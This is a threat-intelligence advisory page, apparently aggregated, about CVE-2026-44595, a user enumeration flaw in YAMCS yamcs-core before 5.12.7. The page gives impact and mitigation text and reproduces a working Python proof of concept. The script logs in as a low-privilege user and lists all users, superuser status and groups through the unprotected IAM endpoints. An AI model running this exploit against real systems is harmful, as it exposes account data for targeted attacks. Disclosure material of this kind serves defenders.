YAMCS yamcs-core 5.12.7 - User Enumeration
YAMCS yamcs-core versions prior to 5. 12. 7 contain a user enumeration vulnerability. This issue allows an attacker to determine valid usernames in the system. The vulnerability affects Linux platforms running the affected software. Exploit code is publicly available in Python. The severity of this vulnerability is assessed as medium.
AI Analysis
Technical Summary
The YAMCS yamcs-core software before version 5.12.7 is vulnerable to user enumeration, which enables attackers to identify valid usernames by interacting with the application. This vulnerability is specific to the Linux platform and has been assigned CVE-2026-44595. Exploit code has been published in Python, demonstrating the feasibility of exploiting this issue. No official patch link is provided, but the vulnerability is fixed in version 5.12.7.
Potential Impact
An attacker can enumerate valid usernames on affected YAMCS yamcs-core installations prior to version 5.12.7. This information disclosure can facilitate further targeted attacks such as brute force or social engineering. There is no indication of direct remote code execution or privilege escalation from this vulnerability alone.
Mitigation Recommendations
Upgrade YAMCS yamcs-core to version 5.12.7 or later, where this user enumeration vulnerability is fixed. Since no official patch link is provided, users should obtain the update from the official vendor site or GitHub repository. No additional mitigation is specified by the vendor.
Indicators of Compromise
- exploit-code: # Exploit Title: YAMCS yamcs-core < 5.12.7 - User Enumeration # Date: 2026-05-27 # Exploit Author: Daniel Miranda Barcelona (Excal1bur) # Vendor Homepage: https://yamcs.org # Software Link: https://github.com/yamcs/yamcs # Version: < 5.12.7 # Tested on: Linux # CVE: CVE-2026-44595 # Category: Remote / Information Disclosure # Advisory: https://github.com/yamcs/yamcs/security/advisories/GHSA-p2rj-mrmc-9w29 #!/usr/bin/env python3 """ CVE-2026-44595 — YAMCS Unauthorized User Enumeration via IAM API ================================================================= IAM API endpoints (listUsers, getUser, listGroups, getGroup) do not enforce SystemPrivilege.ControlAccess. Any authenticated user can enumerate all accounts, superuser status, and group memberships. Affected endpoints: GET /api/iam/users GET /api/iam/users/{name} GET /api/iam/groups GET /api/iam/groups/{name} ================================================================= """ import requests import sys import json def main(): target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8090" username = sys.argv[2] if len(sys.argv) > 2 else "testuser" password = sys.argv[3] if len(sys.argv) > 3 else "test" base = target.rstrip("/") print("=" * 65) print(" CVE-2026-44595 — YAMCS IAM User Enumeration PoC") print(f" Target: {target}") print(f" Username: {username} (low-privilege account)") print("=" * 65) # Authenticate print(f"\n[1] Authenticating as low-privilege user...") try: resp = requests.post(f"{base}/auth/token", data={"grant_type": "password", "username": username, "password": password}) if resp.status_code != 200: print(f" [-] Auth failed: HTTP {resp.status_code}") print(f" [*] Create test user: yamcsadmin users create testuser --password test") return token = resp.json().get("access_token") print(f" [+] Token: {token[:30]}...") headers = {"Authorization": f"Bearer {token}"} except Exception as e: print(f" [-] Error: {e}") return # Enumerate users print(f"\n[2] GET /api/iam/users (requires ControlAccess — not enforced):") resp = requests.get(f"{base}/api/iam/users", headers=headers) print(f" HTTP: {resp.status_code}") if resp.status_code == 200: users = resp.json().get("users", []) print(f"\n [!!!] VULNERABLE — {len(users)} users enumerated:") for u in users: flag = "SUPERUSER" if u.get("superuser") else "regular" print(f" -> {u.get('name')} [{flag}]") elif resp.status_code == 403: print(f" [+] 403 Access Denied — PATCHED") # Enumerate groups print(f"\n[3] GET /api/iam/groups:") resp = requests.get(f"{base}/api/iam/groups", headers=headers) print(f" HTTP: {resp.status_code}") if resp.status_code == 200: groups = resp.json().get("groups", []) print(f"\n [!!!] VULNERABLE — {len(groups)} groups enumerated:") for g in groups: print(f" -> {g.get('name')} ({len(g.get('members', []))} members)") elif resp.status_code == 403: print(f" [+] 403 Access Denied — PATCHED") print("\n" + "=" * 65) print(" Fix: Upgrade to yamcs-core >= 5.12.7") print("=" * 65) if __name__ == "__main__": main()
YAMCS yamcs-core 5.12.7 - User Enumeration
Description
YAMCS yamcs-core versions prior to 5. 12. 7 contain a user enumeration vulnerability. This issue allows an attacker to determine valid usernames in the system. The vulnerability affects Linux platforms running the affected software. Exploit code is publicly available in Python. The severity of this vulnerability is assessed as medium.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The YAMCS yamcs-core software before version 5.12.7 is vulnerable to user enumeration, which enables attackers to identify valid usernames by interacting with the application. This vulnerability is specific to the Linux platform and has been assigned CVE-2026-44595. Exploit code has been published in Python, demonstrating the feasibility of exploiting this issue. No official patch link is provided, but the vulnerability is fixed in version 5.12.7.
Potential Impact
An attacker can enumerate valid usernames on affected YAMCS yamcs-core installations prior to version 5.12.7. This information disclosure can facilitate further targeted attacks such as brute force or social engineering. There is no indication of direct remote code execution or privilege escalation from this vulnerability alone.
Mitigation Recommendations
Upgrade YAMCS yamcs-core to version 5.12.7 or later, where this user enumeration vulnerability is fixed. Since no official patch link is provided, users should obtain the update from the official vendor site or GitHub repository. No additional mitigation is specified by the vendor.
Technical Details
- Cve
- CVE-2026-44595
- Version
- < 5.12.7
- Vendor
- https://yamcs.org
- Application
- https://github.com/yamcs/yamcs
- Author
- Daniel Miranda Barcelona
- Platform
- Linux
- Edb Id
- 52604
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for YAMCS yamcs-core 5.12.7 - User Enumeration
# Exploit Title: YAMCS yamcs-core < 5.12.7 - User Enumeration # Date: 2026-05-27 # Exploit Author: Daniel Miranda Barcelona (Excal1bur) # Vendor Homepage: https://yamcs.org # Software Link: https://github.com/yamcs/yamcs # Version: < 5.12.7 # Tested on: Linux # CVE: CVE-2026-44595 # Category: Remote / Information Disclosure # Advisory: https://github.com/yamcs/yamcs/security/advisories/GHSA-p2rj-mrmc-9w29 #!/usr/bin/env python3 """ CVE-2026-44595 — YAMCS Unauthorized User Enumeration via IAM... (2929 more characters)
Threat ID: 6a1b58ece29bf47b508cc6fb
Added to database: 5/30/2026, 9:38:52 PM
Last enriched: 5/30/2026, 9:39:05 PM
Last updated: 5/31/2026, 2:10:29 AM
Views: 10
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.